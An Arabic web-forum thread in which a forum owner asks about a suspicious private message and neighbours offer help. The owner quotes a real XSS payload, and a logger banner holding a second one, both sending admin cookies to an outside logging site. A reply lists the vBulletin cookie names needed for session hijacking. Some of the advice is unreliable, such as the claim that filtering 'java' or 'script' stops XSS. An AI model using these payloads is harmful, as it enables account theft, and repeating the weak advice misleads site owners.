هل تم إختراق موقعي ؟؟؟؟؟

[Mr_muhammed]

السلام عليكم

في موقعي وصلتني رسالة من أحد الأعضاء،

المهم عندما أردت الرد عليها .. تفجأت بوجود (كود) لم يظهر في الرسالة ولكنه ظهر في الإقتباس عندما أردت الرد ... !!
بعد تتبع العضو اكتشفت أنه أرسل بنفس محتوى الرسالة لكل ( الأدمن في المنتدى) ..

المهم الكود هو

كود:

mailto:assss@wew.ew ]sssssss[/URL]` style=`background:url(javaSCrip	t:document.images[1].src="htt"+"p"+":"+"/"+"/"+"3athriah.com/xss/log.php?Co="+document.cookie)`

المهم نزعت جميع صلاحيات المشرفين ( الأدمن ) .. وغير كلمة السر الخاصة بي .. ولكن سؤالي ماهو هذا الكود .. وكيف يعمل ؟؟؟
وخاصة عندما تتبع الرابط الموجود في النص .. يدلك على موقع( عربي للأسف)

تظهر لك هذه الرسالة :

كود:

Welcome To phpXSSLoger | Coded By Def ~ Devil From Palestine 
---------------------------------------------------------------------- 

To View Logs 
http://www.****.com/xss/view.php?UserH=Username&PassH=Password 

JavAscript - XSS Attack -- Note : The code Have ( - ) Space To Read It 
<-script>document.location="http://www.****.com/xss/log.php?Co="+document.cookie<-/script>

أتمنى أن أجد حل لديكم ؟؟؟

محمد

[Mr_muhammed]

السلام عليكم ..

كنت أبحث في النت عن هذه المشكلة .. فوجدت هذا الموضوع في منتدى أمن العرب

رابط الموضوع

السلام عليكم

ثغرات XSS منتشرة بشكل فظيع وخطورتها تعتمد على نوعيتها بمعنى لو كانت GET أخطر من كونها POST والحالة الأولى ممكن تكون مدموجة بموضوع وممكن تكون عن طريق رابط يتم الطلب من الادمن الضغط عليه

المهم أنا فكرت بعدة طرق بحيث تحمي منتداك مهما اكتشفو ثغرات XSS فيها وباعطيكم بعض الطرق اللي توصلت لها:

1- بما أن استغلال XSS يعتمد على سرقة الكوكي من الأدمن اللي يحتوي على اليوزر والباسورد طيب فكرت ايش المانع أدخل بدون كوكي ؟ بتقولي كيف ؟ بقولك لما تدخل اليوزر والباسورد عشان تدخل المنتدى شيل الصح من مربع تذكرني دائما
المهم حاولت أطبق الطريقة بهذا المنتدى وللأسف كل مرة يرجع يطلب مني اليوزر والباسورد وماعرف السبب بالضبط
بس لما جربتها بمنتدى من نوع PhpBB قدرت ادخل وفتحت الكوكي ومالقيت فيه اليوزر والباسورد بس لقيت Session ID
يعني لو وقعت في فخ ثغرة XSS بيوصل للهكر بس SessionID
طيب هل بيقدر يخترقك ؟
الجواب نعم ولكن بشرط انه يدخل بنفس الوقت اللي قاعد انت تتصفح فيه المنتدى
طيب ايش الفرق بين هذي الطريقة ولما اقوله تذكرني دائما ؟
انه لما تقول تذكرني دائما بيوصله اليوزر والهاش تبع الباسورد بمعنى مو شرط تكون انت جالس تتصفح المنتدى عشان يدخل معك بنفس اللحظة


2- في رقم 1 حاولت تقليل احتمال نسبة اختراق المنتدى ولكن الطريقة ماتصلح بهذا المنتدى مثلا فقلت نمنعه من كتابة سكربتات الجافا اللي تعتبر استغلال لXSS
بتقولي كيف ؟
بقولك في خاصية بلوحة التحكم تجدها في أغلب المنتديات وهي word filters بمعنى انك تمنع ظهور كلمات معينة في أي موضوع يتم كتبابته ومثلا تمنع Java أو script بحيث لما واحد يكتب هالكلمة يتم تبديلها إلى نجوم أو شي ثاني وبالتالي لايعمل الجافا وهذي الطريقة جربتها بمنتداي التجريبي ونجحت وفعلا كان يمنع من كتابة الكلمات بمعنى ماراح يستطيع الهكر تطبيق الثغرة
بس عشان تتأكد أن هذي الطريقة كافية لحماية منتداك تماما من ثغرات XSS لازم تتأكد من منع كل الصيغ والاحتمالات اللي يتم فيها استغلال ثغرات XSS وانا اتوقع ان كلمة Java أو Script تكفي

3- هدف الهكر من استغلال هذه الثغرة هو الكوكي تبع الأدمن فقط
طيب انا ممكن انشئ عضو وحتى ممكن احط عليه لقب مراقب عام بس أجعل صلاحياته يوزر عادي زي أي واحد ثاني ويصير هو النك اللي اكتب فيه واشارك فيه واقرا المواضيع فيه وبهذه الطريقة أتجول بالمنتدى بكل حرية ولا اشيل هم لو الهكر حاطلي استغلال باحد المواضيع أو لا لأنه لو سرق الكوكي ماراح يستفيد لأني يوزر عادي
أما بالنسبة للأدمن فأجعله للاشراف فقط

4- الطريقة الثانية لاستغلال ثغرات XSS هي ان الهكر يرسل للادمن رسالة خاصة أو يكتب موضوع ويستخدم فيه الهندسة الاجتماعية بمعنى يرسل رسالة للادمن ويقول ياليت تحذف هذا الموضوع لأنه كذا وكذا ويحط الرابط طبعا المشكلة ان الادمن بيشوف بداية الرابط هو اسم موقعه ويتطمن ويضغط عليه وهنا الخطأ
ياأدمن لاتضغط على أي رابط مهما كان حتى لو كان مبين وصلة انها داخل المنتدى
مجرد اضغط عليه بالزر اليمين واختر خصائص وشوف الوصلة زين وتابعها إلى آخرها وإذا لقيت رابط موقع ثاني اعرف انه رابط اللوق تبع الهكر واعرف انه حاول يخدعك فتصرف معاه
أما لو كان الرابط سليم ولا فيه رابط فرعي فاضغط عليه


هذي بعض الطرق اللي فكرت فيها للتخلص من ثغرات XSS نهائيا مهما اكتشفوا ثغرات جديدة XSS ماراح تفرق معاك وسيضل منتداك غير قابل للاختراق عن طريقها وأتمنى لو الاعضاء عندهم إضافات أو اقتراحات وتعديلات وتصحيحيات مايبخلون علينا فيها

وكذلك أنا أتمنى من الاعضاء الي عندهم إضافات أو اقتراحات وتعديلات وتصحيحيات مايبخلون علينا فيها ...

محمد

[سلاش أسود]

سلام عليكم ورحمة الله

3-طيب انا ممكن انشئ عضو وحتى ممكن احط عليه لقب مراقب عام بس أجعل صلاحياته يوزر عادي زي أي واحد ثاني ويصير هو النك اللي اكتب فيه واشارك فيه واقرا المواضيع فيه وبهذه الطريقة أتجول بالمنتدى بكل حرية ولا اشيل هم لو الهكر حاطلي استغلال باحد المواضيع أو لا لأنه لو سرق الكوكي ماراح يستفيد لأني يوزر عادي
أما بالنسبة للأدمن فأجعله للاشراف فقط

حلوة مرة هالفكرة تعطية صلاحية مراقب خفيفة والمشرف العام خليه في وقت الفزعة بصراحة فكرتهم اهي حلوة

وذكية انه بيسزتغل الكوكز معاك بكذا أعتقد و100% انه راح يدخل المنتدى بأسم المشرف العام أن أستطاع

ولكن لوحة تحكم المشرف العام مستحيلة للانها محمية بكلمة سرية قبل دخولك للوحة تحكم المنتدى وهذة بعد إذا

غيرت عنوان الملجد admincp إلى أسم ثاني بكذا بيطفش وماراح يقدر يدخلها للأن أغلبيت الهكر يدخلون مواقع

الانجليزي الهكر والروسية او أو ويجيبون ثغرات منهم وبعضها من خبرتهم ولكن كل هجمة لها دفاع قوي على خبرت

صاحب المنتدى او الموقع ولكن هالثغرة عجبتني ومرة حلوة

مشكور اخوي على طرحك الموضوع وليتك وضعت الرابط الي في موقع سكورتي عرب

لك تحياتي اخوك سلاش أسود

[Mr_muhammed]

حياك أخوي ..

والرابط أنا كاتبه فوق قبل الإقتباس ..

( وعشانك أبعيده هنا )

http://www.s4a.cc/forum/showthread.php?t=2763

[mhmd_24h]

مجرد فكرة


جرب حظر كلمة ="+document.cookie من خلال الكلمات المحظورة من لوحة التحكم









-------------------------------------------------------------------------------------------------------------------------------------------

[alseel]

هلا فيك اخوي

هذا اللي ارسل لك الرابط بالعربي يبي يسرق الكوكيز حقك او حق اي واحد لة صلاحيات الادمن؟

يعني اوضح لك اكثر

هذا النوع من ثغرات xss يعني بمجرد ظغطك على الوصلة خلاص الكوكيز اللي في جهازك يروح للوجو اللي رافعة على موقع بالنت ووقتها يقدر يدخل ادمن ببرنامج الكوكيز ايدتور مثل السلام عليكم

لكن صلاحياته محدودة يقدر يحذف يضيف لانه اذا راح بيغير الايميل او شيء بيطلب منه الباسورد القديم عشان كذا

تغير الاندكس ويحذف عضو مايقدر ابدااااااااااااا


والوجو اللي فوق مبرمجة صديقي ديفيل ورائع وجربته بيجيب لك كل المعلومات اللي بجهاز الضحية


اللي يحتاج له الهكر هو المعلومات التالية فقط لكي يدخل ادمن



و طبعا تخطي الكوكيز للجيل الثالث يكون عبر معرفة :


1- bblastvisit

2- bbpassword

3- bbuserid

4- bblastactivity


عشان كذا فيه حل افتح ملف الكونفيق وعلى طول اخر شيء بتلقى

$cookieprefix = 'bb';

bb

غيرها وان شاء الله ماعاد يقدر يسرق كوكيز

في مان الله